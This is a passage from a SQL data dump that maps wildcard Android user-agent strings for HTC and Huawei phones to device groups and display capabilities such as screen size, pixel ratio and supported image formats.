Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_610) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_620) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_620/1.51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_620G_dual_sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_626GPLUS_dual_sim) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_626G_dual_sim) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_816G_dual_sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_820G_PLUS_dual_sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_820G_dual_sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_Desire_X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_H1000C) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_One) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_One_S) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_One_S/3.16) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_One_X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HTC_One_mini_2) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI ALE-CL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI ALE-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G510-0100) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G510-0200) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G510-0251) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G525-U00) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G535-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G6-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G6-L11) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G6-L33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G6-U10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G6-U10) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G6-U251) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G610 xx) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G610-U00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G610-U00) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G610-U15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G610-U20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G610-U20) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G615-U10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G620-A2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G630-U251) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G7-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G7-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G7-TL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G7-UL20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G700-U10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G700-U10) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G700-U20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G700-U20) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G730-U10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G730-U10) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G730-U251) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G730-U251) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G750-T00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G750-T01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G750-T01) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G750-U10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI G750-U10) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI HN3-U00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Hol-U19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI MT1-U06) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI MT1-U06) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI MT7-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI MT7-TL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI P6-C00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI P6-U06) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI P6-U06) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI P7 mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI P7-L00) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI P7-L10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI P7-L12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI T8951) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI U8666E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI U8825-1) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI U8950-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI U8950-1) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI U8950-51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI U8950-51) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI U9508) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI U9510E) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y221-U03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y221-U12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; HUAWEI Y221-U22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 